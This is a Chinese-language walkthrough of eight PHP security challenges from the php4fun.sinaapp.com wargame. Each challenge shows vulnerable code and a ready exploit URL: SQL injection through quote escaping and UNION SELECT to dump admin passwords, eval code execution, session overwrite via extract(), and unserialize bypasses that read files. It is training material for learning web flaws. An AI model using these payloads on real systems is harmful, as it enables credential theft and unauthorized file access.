php4fun.sinaapp.com PHP挑戰通關攻略
challenge 1
php code:
#!php
#GOAL: get password from admin;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
$row = mysql_fetch_assoc($result);
echo "Hello ".$row['name']."</br>";
echo "Your password is:".$row['pass']."</br>";
攻略:
在單引號內的mysql注入,核心就是逃脫單引號,要麼生成一個(htmlentities了單引號,不太可能),要麼...幹掉一個。
所以:
http://php4fun.sinaapp.com/c1/index.php?username=admin\&password=%20or%201%23
challenge 2
php code:
#!php
#GOAL: gather some phpinfo();
$str=@(string)$_GET['str'];
eval('$str="'.addslashes($str).'";');
攻略:
eval('$str="'.addslashes($str).'";');這段最後成為php程式碼 $str="",裡雙引號被addslashes,但內容在雙引號內可以${${這裡執行程式碼}}
所以:
http://phpchallenges2.sinaapp.com/index.php?str=${${phpinfo()}}
challenge 3
php code:
#!php
# GOAL: dump the info for the secret id
require 'db.inc.php';
$id = @(float)$_GET['id'];
$secretId = 1;
if($id == $secretId){
echo 'Invalid id ('.$id.').';
}
else{
$query = 'SELECT * FROM users WHERE id = \''.$id.'\';';
$result = mysql_query($query);
$row = mysql_fetch_assoc($result);
echo "id: ".$row['id']."</br>";
echo "name:".$row['name']."</br>";
}
攻略:
主要是利用php和mysql對float數字型支援的精度不同,精度小的會忽略不能支援的位數。
所以:
http://php4fun.sinaapp.com/c3/index.php?id=1.0000000000001
challenge 4
php code:
#!php
#GOAL:get password from admin
# $yourInfo=array(
# 'id' => 1,
# 'name' => 'admin',
# 'pass' => 'xxx',
# 'level' => 1
# );
require 'db.inc.php';
$_CONFIG['extraSecure']=true;
//if register globals = on, undo var overwrites
foreach(array('_GET','_POST','_REQUEST','_COOKIE') as $method){
foreach($$method as $key=>$value){
unset($$key);
}
}
$kw = isset($_GET['kw']) ? trim($_GET['kw']) : die('Please enter in a search keyword.');
if($_CONFIG['extraSecure']){
$kw=preg_replace('#[^a-z0-9_-]#i','',$kw);
}
$query = 'SELECT * FROM messages WHERE message LIKE \'%'.$kw.'%\';';
$result = mysql_query($query);
$row = mysql_fetch_assoc($result);
echo "id: ".$row['id']."</br>";
echo "message: ".$row['message']."</br>";
攻略:
這段$kw在單引號裡,看起來只要能使用單引號就行,所以幹掉_CONFIG['extraSecure']就ok,剛好前面畫蛇添足的有可利用的變數unset(不然咋通關?),然後就是聯合查詢了。
所以:
http://php4fun.sinaapp.com/c4/index.php?kw='%20and%200%20union%20select%20name,pass%20from%20users%20where%20id=1%23&_CONFIG=aaa
challenge 5
php code:
#!php
# GOAL: overwrite password for admin (id=1)
# Try to login as admin
# $yourInfo=array( //this is your user data in the db
# 'id' => 8,
# 'name' => 'jimbo18714',
# 'pass' => 'MAYBECHANGED',
# 'level' => 1
# );
require 'db.inc.php';
function mres($str) {
return mysql_real_escape_string($str);
}
$userInfo = @unserialize($_GET['userInfo']);
$query = 'SELECT * FROM users WHERE id = \''.mres($userInfo['id']).'\' AND pass = \''.mres($userInfo['pass']).'\';';
$result = mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
$row = mysql_fetch_assoc($result);
foreach($row as $key => $value){
$userInfo[$key] = $value;
}
$oldPass = @$_GET['oldPass'];
$newPass = @$_GET['newPass'];
if($oldPass == $userInfo['pass']){
$userInfo['pass'] = $newPass;
$query = 'UPDATE users SET pass = \''.mres($newPass).'\' WHERE id = \''.mres($userInfo['id']).'\';';
mysql_query($query);
echo 'Password Changed.';
}
else{
echo 'Invalid old password entered.';
}
攻略:
(1) http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt (站上預設顯示的密碼就是個提示...估計是哪位大蝦順手改的) (2) $userInfo['pass'] = $newPass; //這句,改成1
所以:
(1) 修改jimbo18714密碼為8 (2) 再次修改密碼,提交時userInfo為8的序列化,newPass為1
challenge 6
php code:
#!php
#GOAL: get the secret;
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "?????????????????????????????";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
攻略:
serialize一個just4fun的物件,序列化之前先賦值給$o->enter (在本地執行是成功的,php4fun.sinaapp.com不行,程式碼改了?)
所以:
(1) 生成序列化的物件
#!php
class just4fun {
var $enter;
var $secret;
}
$a=new just4fun();
$a->enter='?????????????????????????????';
echo urlencode(serialize($a));
(2)
link?pass=O%3A8%3A%22just4fun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3Bs%3A29%3A%22%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%22%3Bs%3A6%3A%22secret%22%3BN%3B%7D
challenge 7
php code:
#!php
# GOAL: get the key from $hidden_password[207]
session_start();
error_reporting(0);
function auth($password, $hidden_password) {
$res = 0;
if(isset($password) && $password != "") {
if($password == $hidden_password) {
$res = 1;
}
}
$_SESSION["logged"] = $res;
return $res;
}
function display($res){
$aff = htmlentities($res);
return $aff;
}
if(!isset($_SESSION["logged"]))
$_SESSION["logged"] = 0;
$aff = "";
include("config.inc.php");
foreach($_REQUEST as $request) {
if(is_array($request)) {
die("Can not use Array in request!");
}
}
$password = $_POST["password"];
if(!ini_get("register_globals")) {
$superglobals = array($_POST, $_GET);
if(isset($_SESSION)) {
array_unshift($superglobals, $_SESSION);
}
foreach($superglobals as $superglobal) {
extract($superglobal, 0);
}
}
if((isset($password) && $password != "" && auth($password, $hidden_password[207]) == 1) || (is_array($_SESSION) && $_SESSION["logged"] == 1)) {
$aff = display("$hidden_password[207]");
} else {
$aff = display("Try again");
}
echo $aff;
攻略:
get the key from $hidden_password[207] 這句有點模糊,下面的‘所以’可以得到key(繞過REQUEST對陣列的判斷)
所以:
http://php4fun.sinaapp.com/c7/index.php?_SESSION[logged]=1
POST: _SESSION=1
challenge 8
php code:
#!php
#GOAL: file_get_content('sbztz.php') : )
class just4fun {
public $filename;
function __toString() {
return @file_get_contents($this->filename);
}
}
$data = stripslashes($_GET['data']);
if (!$data) {
die("hello from y");
}
$token = $data[0];
$pass = true;
switch ( $token ) {
case 'a' :
case 'O' :
case 'b' :
case 'i' :
case 'd' :
$pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
break;
default:
$pass = false;
}
if (!$pass) {
die("TKS L.N.");
}
echo unserialize($data);
攻略:
http://zone.wooyun.org/content/6697
所以:
(1) 生成利用的data:
O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D (注意%2B)
(2)
http://php4fun.sinaapp.com/c8/index.php?data=O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D
相關文章
- Nest 快速通關攻略2022-04-05
- [極客大挑戰 2019]PHP2024-11-24PHP
- upload-labs通關攻略(全)2021-11-07
- upload-labs通關攻略(1-11關)2021-11-05
- [極客大挑戰 2019]PHP 12024-11-08PHP
- [Flutter新手村]—除錯通關攻略2020-04-05Flutter除錯
- XSS挑戰之旅(通過看程式碼解題)2020-05-15
- SegmentFault 思否技術週刊 -- Go 語言通關攻略2022-05-18Go
- 高通激戰蘋果,英特爾趁勢挑戰摩爾定律上位?2018-12-13蘋果
- 挑戰密室2018-08-09
- 挑戰系統 / 進入區域挑戰怪物2024-09-13
- 打怪升級之路—Security+認證通關攻略(401還是501)2019-02-19
- LeetCode通關:連刷十四題,回溯演算法完全攻略2021-09-14LeetCode演算法
- 上雲安全攻略 | 零售企業如何應對雲上安全新挑戰?2020-04-21
- 挑戰江湖闖關!《劍俠世界:起源》摘星樓闖關獨門秘籍2023-12-27
- 中通快遞關鍵業務和複雜架構挑戰下的 Kubernetes 叢集服務暴露2021-09-09架構
- 【已結束】SegmentFault 思否面試闖關挑戰賽!2023-03-07面試
- 5G時代,RPA助力通訊業迎接新的挑戰2019-10-11
- AI的道德挑戰2018-05-29AI
- xss挑戰賽writeup2020-08-19
- hackyou2014 CTF web關卡通關攻略2020-08-19Web
- 羊了個羊第二關怎麼過?羊了個羊遊戲攻略通關技巧【圖文】2022-09-15遊戲
- linux下Apache+PHP+MySQL安裝配置攻略2020-04-06LinuxApachePHPMySql
- 我國光纖通訊產業的現狀和麵臨的挑戰2021-06-17產業
- 新基建將面臨哪些關鍵挑戰?看中國北京ISC 20202020-03-14
- 直播CDN排程技術關鍵挑戰與架構設計2022-11-15架構
- ARTS 挑戰(第三週)2019-04-15
- ARTS 挑戰(第二週)2019-03-31
- [譯] 挑戰 Flutter 之 Twitter2018-08-12Flutter
- Wanafly挑戰賽25 A因子2018-09-29
- [譯] 挑戰 Flutter 之 WhatsApp2018-08-13FlutterAPP
- 守衛者的挑戰2024-05-27
- 每天都在挑戰極限...2024-04-18
- 獨立開發挑戰2020-06-01
- 牛客挑戰賽582022-03-21
- PSRC雙11闖關挑戰開啟!翻倍獎勵+闖關獎勵High翻全場!2022-10-08
- 哈工大張偉男:人機對話關鍵技術及挑戰2019-10-30
- 賽前重點|考官揭秘GeekPwn雲靶場挑戰賽關鍵點2020-06-30